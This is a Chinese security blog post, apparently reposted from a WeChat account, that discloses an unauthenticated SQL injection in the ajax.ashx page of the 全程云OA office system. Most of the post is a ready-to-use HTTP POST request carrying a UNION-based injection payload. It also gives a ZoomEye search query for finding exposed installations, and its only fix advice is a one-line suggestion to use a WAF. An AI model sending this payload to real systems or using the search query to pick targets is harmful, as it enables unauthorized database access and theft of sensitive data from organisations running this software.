全程云OA ajax.ashx SQL注入漏洞

admin

104722
文章

87
评论

2024年1月7日21:15:09评论77 views字数 692阅读2分18秒阅读模式

漏洞详情

由于全程云0a办公系统 alax.ashx页面参数过滤不当，导致存在sq注入漏洞，未授权的攻击者可利用该漏洞获取数据库中的敏感信息

影响版本

全版本

全程云OA ajax.ashx SQL注入漏洞

漏洞复现

payload

POST /OA/common/mod/ajax.ashx HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate
dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+

回显：

全程云OA ajax.ashx SQL注入漏洞

zoomeye语法

app:"全程云OA"

修复建议

使用waf过滤危险函数

原文始发于微信公众号（棉花糖网络安全圈）：全程云OA ajax.ashx SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

全程云OA ajax.ashx SQL注入漏洞

【漏洞预警】Google Chrome WebP堆缓冲区溢出漏洞威胁通告

H3C ER G2系列路由器敏感信息泄露漏洞

【漏洞通告】城管智慧执法系统任意文件上传漏洞

【漏洞通告】Microsoft 流式处理代理特权提升漏洞

【漏洞通告】宏景 openFile.jsp 任意文件读取漏洞

【漏洞通告】紫光档案系统 upload.html 任意文件上传漏洞

【漏洞预警/复现】广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158

漏洞预警 | Ruvar OA SQL注入漏洞

漏洞预警 | User Meta敏感信息泄露漏洞

漏洞预警 | 联软安全数据交换系统任意文件读取漏洞

发表评论

在线咨询

微信